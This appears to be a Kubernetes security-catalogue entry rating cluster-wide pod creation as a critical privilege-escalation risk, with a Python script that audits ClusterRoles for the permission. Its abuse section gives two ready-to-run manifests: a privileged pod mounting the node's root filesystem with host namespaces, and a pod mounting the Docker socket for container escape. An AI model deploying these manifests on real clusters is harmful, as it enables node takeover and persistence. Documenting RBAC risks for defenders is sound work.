Create pods cluster-wide
Elevation of Privilege
Critical
Overview
| Field | Value |
|---|---|
| ID | 1006 |
| Name | Create pods cluster-wide |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | core |
| Resources | pods |
| Verbs | create |
| Tags | LateralMovement Persistence PrivilegeEscalation WorkloadExecution |
Description
Allows creating new pods in any namespace across the cluster. This is highly critical as it can be used to deploy pods with elevated privileges (e.g., hostPath mounts, privileged security context), leading to node compromise, cluster-wide code execution, and establishing persistence.
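To find which ClusterRoles match this rule (core API group, `pods`, `create`), the following added example, which is not code from the original page, applies RBAC's literal-or-wildcard matching to `kubectl get clusterroles -o json` output. The role names in the sample and the function names are constructed for illustration.

```python
import json

# Constructed input shaped like `kubectl get clusterroles -o json` (not real cluster data).
SAMPLE = json.loads("""
{"items": [
  {"metadata": {"name": "ci-deployer"},
   "rules": [{"apiGroups": [""], "resources": ["pods", "pods/log"], "verbs": ["get", "create"]}]},
  {"metadata": {"name": "ops-wildcard"},
   "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
  {"metadata": {"name": "pod-reader"},
   "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list", "watch"]}]},
  {"metadata": {"name": "deploy-creator"},
   "rules": [{"apiGroups": ["apps"], "resources": ["deployments"], "verbs": ["create"]}]},
  {"metadata": {"name": "exec-only"},
   "rules": [{"apiGroups": [""], "resources": ["pods/exec"], "verbs": ["create"]}]},
  {"metadata": {"name": "health"},
   "rules": [{"nonResourceURLs": ["/healthz"], "verbs": ["get"]}]}
]}
""")


def covers(granted, wanted):
    """RBAC list match: the literal value or the "*" wildcard."""
    return wanted in granted or "*" in granted


def rule_allows_pod_create(rule):
    """True if one PolicyRule grants `create` on `pods` in the core ("") API group."""
    return (covers(rule.get("apiGroups", []), "")
            and covers(rule.get("resources", []), "pods")
            and covers(rule.get("verbs", []), "create"))


def find_pod_creators(cluster_roles):
    """Names of ClusterRoles with at least one rule matching this finding."""
    return sorted(
        role["metadata"]["name"]
        for role in cluster_roles.get("items", [])
        # `rules` may be null on an aggregated role with no matching sources
        if any(rule_allows_pod_create(r) for r in role.get("rules") or [])
    )


if __name__ == "__main__":
    for name in find_pod_creators(SAMPLE):
        print(f"ClusterRole {name} can create pods")
```

A flagged ClusterRole grants the permission in every namespace only when it is bound through a ClusterRoleBinding; bound through a RoleBinding, it is limited to that binding's namespace.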
Abuse Scenarios
- Create a privileged pod with hostPath access to the node’s root filesystem.
```bash
kubectl create -n <namespace> -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: privileged-attacker-pod
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: attacker
    image: busybox
    command: ["/bin/sh", "-c", "sleep infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: host-root
  volumes:
  - name: host-root
    hostPath:
      path: /
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
```
- Create a pod that mounts the host’s Docker socket for container escape.
```bash
kubectl create -n <namespace> -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: docker-socket-pod
spec:
  containers:
  - name: docker-client
    image: docker
    command: ["/bin/sh", "-c", "sleep infinity"]
    volumeMounts:
    - mountPath: /var/run/docker.sock
      name: docker-socket
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock
EOF
```